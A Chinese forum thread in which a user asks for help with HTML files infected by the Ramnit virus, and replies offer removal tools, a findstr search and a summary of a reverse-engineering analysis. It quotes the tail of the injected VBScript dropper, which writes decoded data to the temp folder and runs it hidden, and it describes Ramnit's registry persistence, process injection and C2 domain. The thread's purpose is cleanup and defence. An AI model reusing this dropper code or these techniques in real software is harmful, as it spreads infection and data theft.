本地硬碟html文件全部被寫入大量VBScript病毒代碼求幫助解決？

01-26

電腦是xp系統，本地硬碟文件較多，近日電腦較慢，無意中在一些網頁文件html文件中看到html文件都大於100k位元組，用記事本打開之後發現：在html文件源代碼的結尾里寫入了一大段代碼，以「&

結尾是：
Set FSO = CreateObject("Scripting.FileSystemObject")
DropPath = FSO.GetSpecialFolder(2) "" DropFileName
If FSO.FileExists(DropPath)=False Then
Set FileObj = FSO.CreateTextFile(DropPath, True)
For i = 1 To Len(WriteData) Step 2
FileObj.Write Chr(CLng("H" Mid(WriteData,i,2)))
Next
FileObj.Close
End If

Set WSHshell = CreateObject("WScript.Shell")
WSHshell.Run DropPath, 0
//--&>&
求知乎程序員朋友給幫個忙，知道你們都懂得比較多，看看能否給個解決方案。
1、這總不能我一個一個用手工刪除吧，太要命了
2、千萬別讓我格式化真箇硬碟啊，這個真不能
3、另：系統重做了一遍都不行，重新用一兩個小時之後貌似又開始了。
4、殺毒軟體用的是360的，（別說我小白，因為其他幾款殺毒軟體均已用過，結果一樣。查完，用一天之後還有。）

感謝樓上各位提示。找到賽門鐵克出的針對專殺工具親測有效

W32.Ramnit Removal Tool

findstr /S /M /P VBScript *.html

這就是你需要刪的文件了。看樣子它要在Program Files下自動生成svchost.exe然後執行，至於這個exe具體要幹什麼，估計是找html再寫入script。重做系統之前連Program Files也一併幹掉吧。

病毒，妥妥的。

都是過來人。淚目。

2017年7月上旬：

我中的是新的Virus.Win32.Ramnit.X變種和另一種Virus.VBS.Writebin.A病毒，用Symantec出品的專殺工具FxRamnit在本機和PE(Win2003 OS)上全盤遍歷仍舊無效，病毒不斷捲土重來。隨後乾脆「以毒攻毒」，從U盤啟動PE系統(硬碟系統安全模式下也可以)並運行「360系統急救箱 V5.1.0.1188」，全盤掃描後病毒得到根除。保險起見，個人建議全盤掃描至少兩次(均勾選「360系統急救箱」的「進程管理」選項)，查殺完畢後在感染型病毒母體存放路徑「C:Program FilesMicrosoft」或「C:Program Files (x86)Microsoft」下自行新建一個「DesktopLayer.exe」文件(設為「只讀」模式，並限制用戶操作許可權)。

某論壇網友曾經針對Ramnit病毒的EFG型變種分享過一篇逆向分析文章《rmnet感染型病毒分析》，大體分析了病毒的核心工作原理，騰訊反病毒實驗室也發表過相關內容，本人現簡要整理如下：

一般情況下，病毒通過某種途徑傳播到了目標計算機內，此時病毒為子體狀態（包含病毒母體代碼）
該子體中的病毒代碼隨著文件被調用而運行，在目錄內釋放病毒母體文件(一般文件名為：原文件名+Srv.exe)，然後調用WIN32API函數CreateProcess，創建該病毒的進程及其主線程，完成這些劫持了原程序流程的工作後，程序才跳轉到原來的正常流程部分繼續運行
此時Srv.exe作為病毒母體，複製自身到「C:Program FilesMicrosoftDesktopLayer.exe」，並劫持註冊表中winlogon系統項的userinit，修改其值，實現病毒母體的自動運行
DesktopLayer.exe劫持WIN32API函數ZwWriteVirtualMemory的正常工作流程，改變EIP寄存器的執行，然後調用WIN32API函數CreateProcess創建iexplore.exe進程，由於ZwWriteVirtualMemory是CreateProcess的內部函數，所以創建iexplore.exe進程的流程被篡改，病毒將自己的惡意可執行程序(PE)代碼寫入到iexplore.exe進程中並注入Shellcode，後者的任務是初始化PE
iexplore.exe中PE開始運行，在入口處首先判斷互斥體(Mutex)：「KyUffThOkYwRRtgPP」是否存在(避免重複感染操作)，如果存在便直接退出程序，否則創建6個線程，任務分工為：
1. 每隔1秒執行一次，無限循環，判斷winlogon.exe註冊表項的userinit，確認啟動的是否是病毒母體(開機啟動項中排查不出這種劫持方式)

2. 訪問Google或Bing、Yahoo等備選網站，獲取當前時間
3. 獲取感染時間，保存到文件「dmlconf.dat」中
4. 偽裝成HTTPS協議(躲避殺毒軟體的行為檢測)，通過443埠連接CC伺服器「fget-career.com」，發送竊取到的本地數據
5. 每隔30秒執行一次，無限循環，遍歷全盤，感染*.exe、*.dll、*.htm和*.html文件；對於*.exe和*.dll文件，確保包含病毒母體代碼的區段.rmnet得到注入；對於*.htm和*.html文件，確保包含病毒母體代碼的VB腳本得到注入
6. 遍歷全部驅動器的根目錄，確保全部磁碟內autorun.inf寫入惡意代碼，此代碼可以隨著autorun.inf的自動運行而執行病毒母體

文章《rmnet感染型病毒分析》內的當時分享的病毒清理思路是：

　　遍歷每個進程的句柄表，捕獲目標互斥體的所在進程，結束掉這個進程，然後自己創建這個互斥，這時病毒的感染操作可以視為被手動終止。接下來全盤搜索被感染的文件，進行修復。恢復原始入口點，刪除.rmnet感染節區，修復文件校驗和。

參考鏈接：

賽門鐵克Ramnit病毒專殺工具(Symantec Ramnit Removal Tool) 2.4.4.3
對rmnet蠕蟲病毒的分析
騰訊反病毒實驗室
賽門鐵克攜手歐洲刑警組織聯合打擊Ramnit殭屍網路犯罪團體

我自己親測當前版本的："電腦管家"可以完美修復受感染的html文件。它勝在可以自定義查殺的目錄範圍。

踏馬，這病毒也是醉了

這是 ramnit 病毒。被感染的非 PE 文件可以被修復。感染源 PE 文件需要製作啟動盤殺掉。參考資料自行搜索下。

病毒無疑，不過樓主把16進位的內容發出來看看唄( ′▽` )?

http://www.liuyuyao.com/xd/jzjy/2015-09-10/86.html

解決方法3親測有效。

被這玩意坑的老慘了，樓上答主說的方法，親測可用，它能全盤掃描所有的文件，找出感染的文件進行恢復，html文件也都恢復了，貼出鏈接，為大家指條明路，http://pan.baidu.com/s/1qXN0Bfu

不過我還是決定重裝下，總覺得哪裡有點不放心，學信安的學生，被病毒害的這麼慘，哎~